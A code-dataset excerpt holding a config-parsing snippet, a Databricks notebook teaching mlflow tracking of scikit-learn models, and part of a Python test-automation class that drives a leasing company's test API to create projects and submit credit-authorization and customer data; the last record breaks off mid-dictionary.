[]\n\n for f in os.listdir(path):\n if f.endswith('.conf'):\n configs.append(parse(os.path.join(path, f)))\n\n return configs\n","repo_name":"vchimishuk/pud","sub_path":"pud/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73537340009","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC\n# MAGIC # 02 Model Development with *`mlflow`*\n# MAGIC\n# MAGIC In this notebook, we will see how a typical model development works using `mlflow`. `mlflow` is a facility provided by default in a databricks environment. \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Problem\n# MAGIC We will use `california_housing` dataset to train models that can predict whether a given house is in top 25% most expensive houses.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Preparations\n\n# COMMAND ----------\n\n# change 1 : we need to import mlflow\nimport mlflow\n\nimport yaml \n\nimport pandas as pd\n\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn import model_selection\nfrom sklearn import linear_model, ensemble\n\n# COMMAND ----------\n\ndf_X, ds_y = datasets.fetch_california_housing(return_X_y=True, as_frame=True)\n\nX_tr, X_ts, y_tr, y_ts = model_selection.train_test_split(df_X, ds_y, test_size=0.2, random_state=42)\npercentile_75 = y_tr.describe()[\"75%\"]\n\ny_tr_label = y_tr >= percentile_75\ny_ts_label = y_ts >= percentile_75\n\n# COMMAND ----------\n\nparam_log_reg = {\"loss\": \"log_loss\", \"penalty\": \"elasticnet\"}\nparam_svm = {\"loss\": \"hinge\", \"penalty\": \"elasticnet\"}\n\nmodel_log_reg = linear_model.SGDClassifier(**param_log_reg)\nmodel_svm = linear_model.SGDClassifier(**param_svm)\n\nparam_fast_large = {\"n_estimators\": 100, \"learning_rate\": 0.15}\nparam_slow_small = {\"n_estimators\": 80, \"learning_rate\": 0.1}\n\nmodel_fast_large = ensemble.GradientBoostingClassifier(**param_fast_large)\nmodel_slow_small = ensemble.GradientBoostingClassifier(**param_slow_small)\n\n# COMMAND ----------\n\ndef train_and_test_with_mlflow(model, run_name, tr_X = X_tr, tr_label = y_tr_label, ts_X = X_ts, ts_label = y_ts_label):\n # change 2 : use mlflow.start_run context manager\n with mlflow.start_run(run_name=run_name):\n model.fit(tr_X, tr_label)\n y_pred = model.predict(ts_X)\n # change 3 : log the metrics (instead of or in addition to print)\n mlflow.log_metric(key=\"precision\", value=metrics.precision_score(ts_label, y_pred))\n # print (f\"Precision : {metrics.precision_score(ts_label, y_pred)}\")\n mlflow.log_metric(key=\"recall\", value=metrics.recall_score(ts_label, y_pred))\n # print (f\"Recall : {metrics.recall_score(ts_label, y_pred)}\")\n mlflow.log_metric(key=\"f1\", value=metrics.f1_score(ts_label, y_pred))\n # print (f\"f1 score : {metrics.f1_score(ts_label, y_pred)}\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC ## Training and Testing\n\n# COMMAND ----------\n\ntrain_and_test_with_mlflow(model_log_reg, \"log_reg\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC **More than just metrics**\n# MAGIC\n# MAGIC Actually, `mlflow` can help us track parameters, datasets, and model artifacts in addition to just metrics.\n\n# COMMAND ----------\n\nconda_env = mlflow.sklearn.get_default_conda_env(include_cloudpickle=True)\nwith open(\"../configurations/conda_env.yaml\", \"wt\") as f:\n yaml.dump(conda_env, f)\n\n# COMMAND ----------\n\ndef train_and_test_with_mlflow(model, run_name, params, tr_X = X_tr, tr_label = y_tr_label, ts_X = X_ts, ts_label = y_ts_label):\n # change 2 : use mlflow.start_run context manager\n with mlflow.start_run(run_name=run_name) as run:\n # change 3.2 : log the parameters\n mlflow.log_params(params)\n\n # change 3.3 log the training dataset\n mlflow.log_input(mlflow.data.from_pandas(tr_X), context=\"training-X\")\n mlflow.log_input(mlflow.data.from_numpy(tr_label.to_numpy()), context=\"training-y\")\n\n model.fit(tr_X, tr_label)\n y_pred = model.predict(ts_X)\n # change 3.1 : log the metrics\n mlflow.log_metrics({\n \"precision\" : metrics.precision_score(ts_label, y_pred),\n \"recall\" : metrics.recall_score(ts_label, y_pred),\n \"f1\" : metrics.f1_score(ts_label, y_pred)\n })\n \n # change 3.4 : log the model itself\n mlflow.sklearn.log_model(\n model, run_name,\n conda_env=\"../configurations/conda_env.yaml\",\n signature=mlflow.models.infer_signature(tr_X, y_pred)\n )\n\n # change 4 : record the run_id\n run_id = run.info.run_id\n return run_id\n\n# COMMAND ----------\n\nrun_id_log_reg = train_and_test_with_mlflow(model_log_reg, run_name=\"log_reg_2\", params=param_log_reg)\n\n# COMMAND ----------\n\nrun_id_svm = train_and_test_with_mlflow(model_svm, run_name=\"svm\", params=param_svm)\n\n# COMMAND ----------\n\nrun_id_gbm_fast_large = train_and_test_with_mlflow(model_fast_large, run_name=\"gbm_fast_large\", params=param_fast_large)\n\n# COMMAND ----------\n\nrun_id_gbm_slow_small = train_and_test_with_mlflow(model_slow_small, run_name=\"gbm_slow_small\", params=param_slow_small)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC **Even how metrics progresses**\n# MAGIC\n# MAGIC In the example below, we will illustrate how `mlflow` can be used to track progression of metrics.\n\n# COMMAND ----------\n\nfrom sklearn import neural_network\n\nnet = neural_network.MLPClassifier(\n hidden_layer_sizes=(20, 20), \n max_iter=25,\n warm_start=True\n)\n\nwarm_start=False\n\nwith mlflow.start_run(run_name=\"neural_network\"):\n for i in range(0, 10):\n net.fit(X_tr, y_tr_label)\n y_pred = net.predict(X_ts)\n mlflow.log_metrics({\n \"precision\" : metrics.precision_score(y_ts_label, y_pred),\n \"recall\" : metrics.recall_score(y_ts_label, y_pred),\n \"f1\" : metrics.f1_score(y_ts_label, y_pred)\n }, step=net.n_iter_)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC ## Log the `run_id`\n# MAGIC\n# MAGIC Now, let us log the run_ids for cases when we want to register and serve one of these models.\n\n# COMMAND ----------\n\nwith open(\"../configurations/run_ids.yaml\", \"wt\") as f:\n yaml.dump({\n \"run_id\" : {\n \"gbm_fast_large\": run_id_gbm_fast_large,\n \"gbm_slow_small\": run_id_gbm_slow_small,\n \"log_reg\": run_id_log_reg,\n \"svm\": run_id_svm\n }\n }, f)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC > Do not worry if you miss this step, run_ids are also accessible from databricks UI.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC ## Summary\n# MAGIC\n# MAGIC We learnt that tracking the models, (training) parameters and (test) performance as well as datasets using **`mlflow`** is easy and straightforward. It reduces errors and is less cumbersome. Finally, it facilitates recording of experiments with minimum changes to workflows. \n\n# COMMAND ----------\n\n\n","repo_name":"neolaw84/databricks-sandbox","sub_path":"train/02_model_development_with_mlflow.py","file_name":"02_model_development_with_mlflow.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1534915319","text":"from urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom Z500.tools import test_data\nfrom Z500.common.login import login\nfrom Z500.models import Test\nfrom Z500.models import Sys_param_config\nfrom Z500.models import Auth_group\nfrom Z500.tools.dingtalk import send_notify\n\n\n\nimport time\nimport requests\nimport jsonpath\nimport datetime\n\n\nclass xiaoWeiNew():\n\n def __init__(self, headers):\n self.headers = headers\n self.url = 'https://test-vrip.msfl.com.cn/'\n self.req = requests.session()\n\n def api(self,**kwargs):\n\n retries = Retry(total=2,\n status_forcelist=[400, 500, 502, 503, 504])\n url = self.url +kwargs.get(\"url\")\n kwargs.pop(\"url\")\n self.req.mount('http://', HTTPAdapter(max_retries=retries))\n self.req.mount('https://', HTTPAdapter(max_retries=retries))\n\n try:\n res = self.req.request(url =url, verify=False, headers=self.headers, **kwargs).json()\n print(url,res)\n return res\n except Exception as e:\n print(\"发生异常:\", str(e))\n time.sleep(30)\n res = self.req.request(url=url, verify=False, headers=self.headers, **kwargs).json()\n print(url, res)\n return res\n\n def updateHeader(self,custName):\n res = login(custName)\n headers = {\"AccessToken\": res[\"access_token\"]}\n self.headers = headers\n\n def add_pro(self,lesaseName):\n '''新建项目'''\n url = 'ifc/api/credit-auth/createProj?leaseName=%s' % lesaseName\n res = self.api(method=\"GET\", url=url)\n return res\n\n def pro_page(self):\n url = 'ifc/api/credit-auth/project/page'\n data = {\n \"current\": 1,\n \"size\": 20,\n \"leaseName\": \"\",\n \"statusCode\": \"000000\"\n }\n res = self.api(method =\"POST\", url=url, json = data)\n return res\n\n def preQuery(self,projectNo):\n '''预审初始化'''\n url = 'ifc/api/pre-approval/init?projectNo=%s'%projectNo\n res = self.api(method = \"GET\", url = url)\n return res\n\n def getPro(self,projectNo):\n url = 'ifc/api/credit-auth/project/query/detail?projectNo=%s'%projectNo\n res = self.api(method =\"GET\", url=url)\n return res\n\n def creditAuthSave(self,projectNo,custName,guarantor):\n '''创建征信授权'''\n url = 'https://test-asp.msfl.com.cn/asp/ifc/notice/credit-auth/save'\n\n retries = Retry(total=2,\n status_forcelist=[400, 500, 502, 503, 504])\n req =requests.session()\n req.mount('http://', HTTPAdapter(max_retries=retries))\n req.mount('https://', HTTPAdapter(max_retries=retries))\n\n data = test_data.getAuthData(projectNo,custName,guarantor)\n for i in data:\n try:\n res = req.request(method='POST', url=url, json=i,verify=False, headers=self.headers)\n time.sleep(1)\n except:\n time.sleep(30)\n res = req.request(method='POST', url=url, json=i, verify=False, headers=self.headers)\n time.sleep(1)\n\n def creditAuthBack(self,projectNo,custName,guarantor):\n '''征信授权完成'''\n url = 'https://test-asp.msfl.com.cn/asp/ifc/notice/credit-auth/signOffCallback'\n retries = Retry(total=2,\n status_forcelist=[400, 500, 502, 503, 504])\n req = requests.session()\n req.mount('http://', HTTPAdapter(max_retries=retries))\n req.mount('https://', HTTPAdapter(max_retries=retries))\n\n data = test_data.getBackData(projectNo,custName,guarantor)\n for i in data:\n try:\n res = req.request(method='POST', url=url, json=i,verify=False, headers=self.headers)\n except:\n time.sleep(30)\n res = req.request(method='POST', url=url, json=i,verify=False, headers=self.headers)\n\n\n def taskCompleteInit(self,taskid):\n '''初始化流程'''\n url = 'ifc/api/flow/task-complete/init?taskId=%s'%taskid\n res = self.api(method='GET', url=url)\n return res\n\n def proSubmit(self,projectNo,guarantor):\n '''预审提交'''\n url = 'ifc/api/pre-approval/submit'\n res_query = self.preQuery(projectNo)\n if guarantor == '1':\n data={\n \"projectNo\": projectNo,\n \"customerList\": [\n {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[0],\n \"creditCustomerType\": jsonpath.jsonpath(res_query,'$..creditCustomerType')[0],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerTypeName')[0],\n \"creditCustomerName\": jsonpath.jsonpath(res_query,'$..creditCustomerName')[0],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query,'$..creditCustomerNo')[0],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query,'$..creditCustomerIdType')[0],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerIdTypeName')[0],\n \"roleType\": \"6\"\n },\n {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[1],\n \"creditCustomerType\": jsonpath.jsonpath(res_query,'$..creditCustomerType')[1],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerTypeName')[1],\n \"creditCustomerName\": jsonpath.jsonpath(res_query,'$..creditCustomerName')[1],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query,'$..creditCustomerNo')[1],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query,'$..creditCustomerIdType')[1],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerIdTypeName')[1],\n \"roleType\": \"1\"\n },\n {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[2],\n \"creditCustomerType\": jsonpath.jsonpath(res_query,'$..creditCustomerType')[2],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerTypeName')[2],\n \"creditCustomerName\": jsonpath.jsonpath(res_query,'$..creditCustomerName')[2],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query,'$..creditCustomerNo')[2],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query,'$..creditCustomerIdType')[2],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerIdTypeName')[2],\n \"roleType\": \"2\"\n },\n {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[3],\n \"creditCustomerType\": jsonpath.jsonpath(res_query,'$..creditCustomerType')[3],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerTypeName')[3],\n \"creditCustomerName\": jsonpath.jsonpath(res_query,'$..creditCustomerName')[3],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query,'$..creditCustomerNo')[3],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query,'$..creditCustomerIdType')[3],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query,'$..creditCustomerIdTypeName')[3],\n \"roleType\": \"3\"\n }\n ],\n \"productType\": \"LS-DFL\",\n \"productNo\": \"LeaseYXZ300\"\n }\n else:\n data = {\n \"projectNo\": projectNo,\n \"customerList\": [\n {\n \"id\": jsonpath.jsonpath(res_query, '$..id')[0],\n \"creditCustomerType\": jsonpath.jsonpath(res_query, '$..creditCustomerType')[0],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query, '$..creditCustomerTypeName')[0],\n \"creditCustomerName\": jsonpath.jsonpath(res_query, '$..creditCustomerName')[0],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query, '$..creditCustomerNo')[0],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query, '$..creditCustomerIdType')[0],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query, '$..creditCustomerIdTypeName')[0],\n \"roleType\": \"6\"\n },\n {\n \"id\": jsonpath.jsonpath(res_query, '$..id')[1],\n \"creditCustomerType\": jsonpath.jsonpath(res_query, '$..creditCustomerType')[1],\n \"creditCustomerTypeName\": jsonpath.jsonpath(res_query, '$..creditCustomerTypeName')[1],\n \"creditCustomerName\": jsonpath.jsonpath(res_query, '$..creditCustomerName')[1],\n \"creditCustomerNo\": jsonpath.jsonpath(res_query, '$..creditCustomerNo')[1],\n \"creditCustomerIdType\": jsonpath.jsonpath(res_query, '$..creditCustomerIdType')[1],\n \"creditCustomerIdTypeName\": jsonpath.jsonpath(res_query, '$..creditCustomerIdTypeName')[1],\n \"roleType\": \"1\"\n }\n ],\n \"productType\": \"LS-DFL\",\n \"productNo\": \"LeaseYXZ300\"\n }\n\n res = self.api(method =\"POST\", url=url, json = data)\n return res_query\n\n def opinionSumit(self,taskId):\n res = self.taskCompleteInit(taskId)\n if not res[\"data\"][\"remind\"]:\n remind = '测试同意'\n else:\n remind = res[\"data\"][\"remind\"]\n '''提交审批意见'''\n url = 'ifc/api/flow/task-complete'\n data = {\n \"remind\": remind,\n \"taskId\": taskId\n }\n time.sleep(3)\n res = self.api(method = 'POST', url =url,json = data)\n\n def custEnterpriseQuery(self,projectNo):\n '''客户信息-承租人-查询'''\n url = 'ifc/api/proj_cust_enterprise_info/queryByCondition'\n data = {\n \"projectNo\": projectNo\n }\n res = self.api(method = 'POST', url =url,json = data)\n return res\n\n def custEnterpriseSave(self,projectNo):\n '''客户信息-承租人-保存'''\n res_query = self.custEnterpriseQuery(projectNo)\n url = 'ifc/api/proj_cust_enterprise_info/save'\n data = {\n \"id\": jsonpath.jsonpath(res_query,'$..id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..sourceId')[0],\n \"projectCustomerInfoId\": jsonpath.jsonpath(res_query,'$..projectCustomerInfoId')[0],\n \"roleType\": jsonpath.jsonpath(res_query,'$..roleType')[0],\n \"name\": jsonpath.jsonpath(res_query,'$..name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..idCardNo')[0],\n \"phoneNumber\": jsonpath.jsonpath(res_query,'$..phoneNumber')[0],\n \"country\": \"156\",\n \"countryName\": \"中国\",\n \"interIndustryClassifyOne\": \"A\",\n \"interIndustryClassifyTwo\": \"A01\",\n \"interIndustryClassifyThree\": \"A011\",\n \"interIndustryClassifyFour\": \"A0111\",\n \"interIndustryClassifyOneName\": \"农、林、牧、渔业\",\n \"interIndustryClassifyTwoName\": \"农业\",\n \"interIndustryClassifyThreeName\": \"谷物种植\",\n \"interIndustryClassifyFourName\": \"稻谷种植\",\n \"industryClassifyOne\": \"A\",\n \"industryClassifyTwo\": \"A01\",\n \"industryClassifyOneName\": \"机加\",\n \"industryClassifyTwoName\": \"机械加工\",\n \"registrationProvince\": \"110000\",\n \"registrationCity\": \"110100\",\n \"registrationRegion\": \"110101\",\n \"registrationProvinceName\": \"北京市\",\n \"registrationCityName\": \"市辖区\",\n \"registrationRegionName\": \"东城区\",\n \"registrationAddress\": \"上海\",\n \"officeProvince\": \"110000\",\n \"officeCity\": \"110100\",\n \"officeLocation\": \"110101\",\n \"officeProvinceName\": \"北京市\",\n \"officeCityName\": \"市辖区\",\n \"officeLocationName\": \"东城区\",\n \"officeAddress\": \"上海\",\n \"actualBusinessProvince\": \"110000\",\n \"actualBusinessCity\": \"110100\",\n \"actualBusinessLocation\": \"110101\",\n \"actualBusinessProvinceName\": \"北京市\",\n \"actualBusinessCityName\": \"市辖区\",\n \"actualBusinessLocationName\": \"东城区\",\n \"actualBusinessAddress\": \"上海\",\n \"rentStockholderRelated\": False,\n \"rentRelated\": False,\n \"ruralUrbanSignage\": \"N\",\n \"ruralUrbanSignageName\": \"否\",\n \"projectSource\": \"01\",\n \"projectSourceName\": \"银行推荐\",\n \"licProjectInvestmentOne\": \"A\",\n \"licProjectInvestmentTwo\": \"A01\",\n \"licProjectInvestmentThree\": \"A011\",\n \"licProjectInvestmentFour\": \"A0111\",\n \"licProjectInvestmentOneName\": \"农、林、牧、渔业\",\n \"licProjectInvestmentTwoName\": \"农业\",\n \"licProjectInvestmentThreeName\": \"谷物种植\",\n \"licProjectInvestmentFourName\": \"稻谷种植\",\n \"businessScope\": \"测试\",\n \"mainBusinessProducts\": \"测试\",\n \"enterpriseSize\": \"LARGE\",\n \"enterpriseSizeName\": \"大型\",\n \"enterpriseType\": \"10\",\n \"enterpriseTypeName\": \"法人企业\",\n \"institutionRegistCertNumber\": None,\n \"financialInstitutionCode\": None,\n \"holdingType\": \"A\",\n \"holdingTypeName\": \"公有控股经济\",\n \"zhongzhengCode\": \"122\",\n \"currency\": \"CNY\",\n \"currencyName\": \"人民币\",\n \"registeredCapital\": \"1000.00\",\n \"paidinCapital\": \"1000.00\",\n \"capitalization\": \"1000.00\",\n \"revenue\": \"1000.00\",\n \"establishmentTime\": \"2023-07-19 00:00:00\",\n \"businessLicenseExpirationDate\": \"2025-07-19 00:00:00\",\n \"businessStatus\": \"01\",\n \"businessStatusName\": \"正常运营\",\n \"employeeNumber\": \"1000\",\n \"legalRepresentative\": jsonpath.jsonpath(res_query,'$..legalRepresentative')[0],\n \"legalRepresentativeMobile\": jsonpath.jsonpath(res_query,'$..legalRepresentativeMobile')[0],\n \"legalPersonPhone\": jsonpath.jsonpath(res_query,'$..legalPersonPhone')[0],\n \"actualController\": jsonpath.jsonpath(res_query,'$..actualController')[0],\n \"nationalEconomy\": \"A\",\n \"nationalEconomyName\": \"广义政府\",\n \"listedCompanyLogo\": \"A\",\n \"listedCompanyLogoName\": \"A股\",\n \"resolutionType\": jsonpath.jsonpath(res_query,'$..resolutionType')[0],\n \"resolutionTypeName\": jsonpath.jsonpath(res_query,'$..resolutionTypeName')[0],\n \"email\": \"123@163.com\",\n \"registration\": [\"110000\", \"110100\", \"110101\"],\n \"industryType\": [\"A\", \"A01\"],\n \"office\": [\"110000\", \"110100\", \"110101\"],\n \"actualBusiness\": [\"110000\", \"110100\", \"110101\"],\n \"internationalIndustryType\": [\"A\", \"A01\", \"A011\", \"A0111\"],\n \"licProjectInvestment\": [\"A\", \"A01\", \"A011\", \"A0111\"],\n \"shareholdingStructureList\": []\n }\n res = self.api(method = 'POST', url =url,json = data)\n\n def custEnterpriseRelatedQuery(self,projectNo):\n '''客户信息-关键人-查询'''\n url = 'ifc/api/proj_cust_enterprise_related_info/queryByCondition'\n data = {\n \"projectNo\": projectNo\n }\n res = self.api(method = 'POST', url =url,json = data)\n return res\n\n def creditQuery(self,projectNo):\n '''客户信息-受益人-查询'''\n url = 'ifc/api/credit-auth/queryList'\n data = {\n \"customerName\": \"\",\n \"projectNo\": projectNo,\n \"isUse\": 1,\n \"creditAuthStatus\": 1,\n \"creditCustomerType\": \"IND\"\n }\n res = self.api(method = 'POST', url =url,json = data)\n return res\n\n def custEnterpriseRelateSave(self,projectNo,guarantor):\n '''客户信息-关键人-保存'''\n res_query = self.custEnterpriseRelatedQuery(projectNo)\n res_credit =self.creditQuery(projectNo)\n url = 'ifc/api/proj_cust_enterprise_related_info/edit'\n if guarantor == '2':\n data = {\n \"projectNo\": projectNo,\n \"actualController\": {\n \"id\": jsonpath.jsonpath(res_query,'$..actualController.id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..actualController.sourceId')[0],\n \"enterpriseInfoId\": jsonpath.jsonpath(res_query,'$..actualController.enterpriseInfoId')[0],\n \"roleType\": \"6\",\n \"resolutionType\": None,\n \"resolutionTypeName\":None,\n \"name\": jsonpath.jsonpath(res_query,'$..actualController.name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..actualController.idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..actualController.idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..actualController.idCardNo')[0],\n \"mobile\": jsonpath.jsonpath(res_query,'$..actualController.mobile')[0],\n \"shareholdingRatio\": None,\n \"renterRelationship\": None,\n \"residenceAddress\": None,\n \"creditReportTime\": None,\n \"authId\": jsonpath.jsonpath(res_query,'$..actualController.authId')[0],\n \"idProvince\": \"110000\",\n \"idProvinceName\": None,\n \"idCity\": \"110100\",\n \"idCityName\": None,\n \"idLocation\": \"110101\",\n \"idLocationName\": None,\n \"idAddress\": \"上海\",\n \"idArray\": [\"110000\", \"110100\", \"110101\"]\n },\n \"legalRepresentative\": {\n \"id\": jsonpath.jsonpath(res_query,'$..legalRepresentative.id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.sourceId')[0],\n \"enterpriseInfoId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.enterpriseInfoId')[0],\n \"roleType\": \"4\",\n \"resolutionType\": None,\n \"resolutionTypeName\": None,\n \"name\": jsonpath.jsonpath(res_query,'$..legalRepresentative.name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardNo')[0],\n \"mobile\": jsonpath.jsonpath(res_query,'$..legalRepresentative.mobile')[0],\n \"shareholdingRatio\": None,\n \"renterRelationship\": None,\n \"residenceAddress\": None,\n \"creditReportTime\": None,\n \"authId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.authId')[0],\n \"idProvince\": \"110000\",\n \"idProvinceName\": None,\n \"idCity\": \"110100\",\n \"idCityName\": None,\n \"idLocation\": \"110101\",\n \"idLocationName\": None,\n \"idAddress\": \"上海\",\n \"idArray\": [\"110000\", \"110100\", \"110101\"]\n },\n \"beneficiary\": {\n \"authId\": jsonpath.jsonpath(res_credit,'$..id')[0],\n \"name\": jsonpath.jsonpath(res_credit,'$..creditCustomerName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_credit,'$..creditCustomerNo')[0],\n \"idCardType\": jsonpath.jsonpath(res_credit,'$..creditCustomerIdType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_credit,'$..creditCustomerIdTypeName')[0],\n \"residenceAddress\": jsonpath.jsonpath(res_credit,'$..creditCustomerAddress')[0],\n \"idArray\": [\"110000\", \"110100\", \"110101\"],\n \"idProvince\": \"110000\",\n \"idCity\": \"110100\",\n \"idLocation\": \"110101\"\n },\n \"personalIds\": [],\n \"custEnterpriseIds\": [],\n \"personalInfoModels\":[],\n \"projCustEnterpriseVMList\":[]\n }\n elif guarantor == '1':\n data = {\n \"projectNo\": projectNo,\n \"actualController\": {\n \"id\": jsonpath.jsonpath(res_query,'$..actualController.id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..actualController.sourceId')[0],\n \"enterpriseInfoId\": jsonpath.jsonpath(res_query,'$..actualController.enterpriseInfoId')[0],\n \"roleType\": \"6\",\n \"resolutionType\": None,\n \"name\": jsonpath.jsonpath(res_query,'$..actualController.name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..actualController.idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..actualController.idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..actualController.idCardNo')[0],\n \"mobile\": jsonpath.jsonpath(res_query,'$..actualController.mobile')[0],\n \"shareholdingRatio\": None,\n \"renterRelationship\": None,\n \"residenceAddress\": None,\n \"creditReportTime\": None,\n \"authId\": jsonpath.jsonpath(res_query,'$..actualController.authId')[0],\n \"idProvince\": \"110000\",\n \"idProvinceName\": \"北京市\",\n \"idCity\": \"110100\",\n \"idCityName\": \"市辖区\",\n \"idLocation\": \"110101\",\n \"idLocationName\": \"东城区\",\n \"idAddress\": \"上海\",\n \"idArray\": [\"110000\", \"110100\", \"110101\"]\n },\n \"legalRepresentative\": {\n \"id\": jsonpath.jsonpath(res_query,'$..legalRepresentative.id')[0],\n \"projectNo\": projectNo,\n \"sourceId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.sourceId')[0],\n \"enterpriseInfoId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.enterpriseInfoId')[0],\n \"roleType\": \"4\",\n \"resolutionType\": None,\n \"name\": jsonpath.jsonpath(res_query,'$..legalRepresentative.name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardNo')[0],\n \"mobile\": jsonpath.jsonpath(res_query,'$..legalRepresentative.mobile')[0],\n \"shareholdingRatio\": None,\n \"renterRelationship\": None,\n \"residenceAddress\": None,\n \"creditReportTime\": None,\n \"authId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.authId')[0],\n \"idProvince\": \"110000\",\n \"idProvinceName\": \"北京市\",\n \"idCity\": \"110100\",\n \"idCityName\": \"市辖区\",\n \"idLocation\": \"110101\",\n \"idLocationName\": \"东城区\",\n \"idAddress\": \"上海\",\n \"idArray\": [\"110000\", \"110100\", \"110101\"]\n },\n \"beneficiary\": {\n \"authId\": jsonpath.jsonpath(res_credit,'$..id')[0],\n \"name\": jsonpath.jsonpath(res_credit,'$..creditCustomerName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_credit,'$..creditCustomerNo')[0],\n \"idCardType\": jsonpath.jsonpath(res_credit,'$..creditCustomerIdType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_credit,'$..creditCustomerIdTypeName')[0],\n \"residenceAddress\": jsonpath.jsonpath(res_credit,'$..creditCustomerAddress')[0],\n \"idArray\": [\"110000\", \"110100\", \"110101\"],\n \"idProvince\": \"110000\",\n \"idCity\": \"110100\",\n \"idLocation\": \"110101\"\n },\n \"personalIds\": [],\n \"custEnterpriseIds\": [],\n \"personalInfoModels\":[\n {\n \"id\":res_query[\"data\"][\"personalInfoModels\"][0][\"id\"],\n \"projectNo\": projectNo,\n \"projectCustomerInfoId\": res_query[\"data\"][\"personalInfoModels\"][0][\"projectCustomerInfoId\"],\n \"sourceId\":res_query[\"data\"][\"personalInfoModels\"][0][\"sourceId\"],\n \"roleType\":res_query[\"data\"][\"personalInfoModels\"][0][\"roleType\"],\n \"name\":res_query[\"data\"][\"personalInfoModels\"][0][\"name\"],\n \"idCardType\":res_query[\"data\"][\"personalInfoModels\"][0][\"idCardType\"],\n \"idCardTypeName\":res_query[\"data\"][\"personalInfoModels\"][0][\"idCardTypeName\"],\n \"idCardNo\":res_query[\"data\"][\"personalInfoModels\"][0][\"idCardNo\"],\n \"mobile\":res_query[\"data\"][\"personalInfoModels\"][0][\"mobile\"],\n \"country\":\"156\",\n \"countryName\":None,\n \"actualControllerRelationship\":\"director\",\n \"actualControllerRelationshipName\":None,\n \"maritalStatus\":\"MARRIED\",\n \"maritalStatusName\":None,\n \"gender\":\"1\",\n \"genderName\":None,\n \"birthDate\":\"1980-07-28\",\n \"nation\":\"22\",\n \"nationName\":None,\n \"education\":\"1010\",\n \"educationName\":None,\n \"annualIncome\":\"1000.00\",\n \"idProvince\":\"110000\",\n \"idProvinceName\":None,\n \"idCity\":\"110100\",\n \"idCityName\":None,\n \"idLocation\":\"110101\",\n \"idLocationName\":None,\n 